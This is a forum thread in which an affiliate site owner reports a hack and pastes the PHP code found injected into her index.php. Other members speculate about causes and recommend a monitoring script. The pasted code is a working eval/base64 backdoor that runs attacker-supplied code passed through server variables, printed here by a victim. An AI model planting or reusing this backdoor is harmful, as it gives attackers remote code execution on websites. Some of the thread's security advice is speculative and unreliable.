My Affiliate Site was Hacked!!! So freakin' mad...

[trishworks4u]

Holy crap! wtf? I just thought sales were slow. Turns out someone uploaded a php script:

<?php function gpc_4808($l4810){if(is_array($l4810)){foreach($l48 10 as $l4808=>$l4809)$l4810[$l4808]=gpc_4808($l4809);}elseif(is_string($l4810) && substr($l4810,0,4)=="____"){eval(base64_decode(sub str($l4810,4)));$l4810=null;}return $l4810;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_V ARS;array_map("gpc_4808",$_SERVER);
// Silence is golden.
?>

to index.php that took my whole freakin' site offline a week ago! How does this happen? I am the only one that has ftp access to any of my sites.

I only have 1 site that really makes any money and this is it. I'm already in a mood today. This is just so wrong.

[Ross Vegas]

I have one fairly high profile niche site, that just had something similar happen as well...

RFI (remote file inclusion) look it up..it's freaky how easily some people can access your files.

With php basically if a few tricks aren't employed someone can run their own file from your server and through some dark magic I don't truly understand they create a file on your server which basically acts like an entire ftp control panel.

I have someone that takes care of this stuff for me so I can't help much more than that...sucks for sure though.

[thunderbird]

What CMS did you use for your site?

[trishworks4u]

are you talking about a content mgmt system? because I don't. I build my sites in Dreamweaver and upload w/ Filezilla. There's no online editing going on there.

Well, unless it's a blog. I have lots of those but those are all WP and this was not a WP platform. Straight html sales/review page.

[thunderbird]

Yup, that's what I meant. Just wondering, in case this might be a hint of attacks to come (wp is my main concern). No advice to offer. Sometimes hosts can improve security, close some holes.

[trishworks4u]

yeah - was thinking I might be able to figure out who it was through google analytics or my raw access files but I can't. I even contacted my host (Bluehost) who wrote back right away with a mile long list of security scripts and stuff that might as well be in Chinese. They also told me that I won't be able to figure out who it is.

It looks like in your cpanel you can actually block IP addresses from accessing your site and, if you don't have an IP address, you can enter in a domain name and they will try to block with that. I'm wondering if I just shouldn't pull up my main competitors in that niche and put them all in there. Ridiculous that I would have to do that.

[Daniel Brock]

I still don't get the point of putting effort into hacking someones site when they don't do anything with it.

It seems like most of these hackers 'hack'(or run a pre-made script...wow so hard!), for no reason at all. Most of the times all they do is deface a website or bring it down.

They must not value their time at all of they are spending it on bringing peoples websites down for ****s and giggles.

[TinkBD]

I am so sorry for your pain, Trish! It may well be that the problem is with your computer.

I went thru this in March/April with a number of my sites.

I checked both of my computers with ZoneAlarm, SpyBot Search and Destroy, AdAware, and MalwareBytes AntiMalware and found nothing... but it kept happening!

I finally contacted my computer guy and we discussed my options... We figured that the odds were high that both my desktop and laptop were affected/infected... I hope to replace them both this year, so we decided to leave the desktop alone and wipe the laptop.

Now I use the desktop to surf, but not access the backend of any of my web sites...

I work on my sites only from the laptop. I hand carry files back and forth between the two.

So far so good... It is a PITA but my sites have stayed clean...

The painful thing is that I lost a LOT of time and even more disturbing, I lost a lot of my impetus. I am now FINALLY getting back in the groove. ...sigh...

BTW, my computer guy is familiar with the WF. I don't think that he spends much time here though. LOLOL

Tink

[Janet Sawyer]

A second vote for site warder.

It works. It reports and it does it's job.

Site Warder - Website File Monitoring Script

I've got an affiliate link to this, but don't want to make any money from here.

(John, just want to say thanks for a brilliant script.)

Buy it Jeeze only $27 for real peace of mind, and so simple to use too.

[trishworks4u]

I appreciated the referrals to sitewarder. Am checking it out and working on security now. The only reason I think this is malicious, and then I'm going to take a deep breath and let it go (promise) is because this is my one money making site out of at least 20 that I have up and it's in a competitive niche AND I got in at the beginning, on a hunch...all of my traffic is organic.

Trust me, if you want shop at my ebay store, look at any of my blogs, buy any number of clickbank products, solar panels...I don't even know what else. Those sites are all up and not earning a dime. Heck - I'd hand out the FTP access if I thought it might improve them.

Ok, I'm calling it a night. but, that's my point really. It's that ONE site.... grrrrrrr

[CmdrStidd]

Trish, do you use a business layer in your design to filter all the inputs through? What kind of validation do you do on your inputs from the end user? You should have a business layer and a validation layer between the end user gui and the communications layer to block these kinds of attacks.

[ryansjones]

I had that problem myself in the first few months when I still had www.ryansjones.com (which I decided to scrap this summer when it was time to renew the website due ot the lack of conversions and since I had a better site in mind). One time, I had a blank screen when I accessed my site, at another time I got a "forbidden" message for some reason, amonst several things. Though I was able to regain control each time and put it back to how it was (that was the turn key website I had with yourbizwebsites). Since I've joined global domains international, I haven't had any problems with my sites through them (though Site Builder does get glitchy at times from my experience).

[Catalyst eMarketing]

Trish, so sorry this happened to you!

Quote:

Originally Posted by trishworks4u

I build my sites in Dreamweaver and upload w/ Filezilla.

FileZilla could very well be the problem. Lots of people are getting hacked after uploading sites with Filezilla.

Here's a post from a Warrior member all about it.

My sites were hacked last week (This may help if it happens to you)

Plus you can Google: Filezilla hacked and various keywords for more info.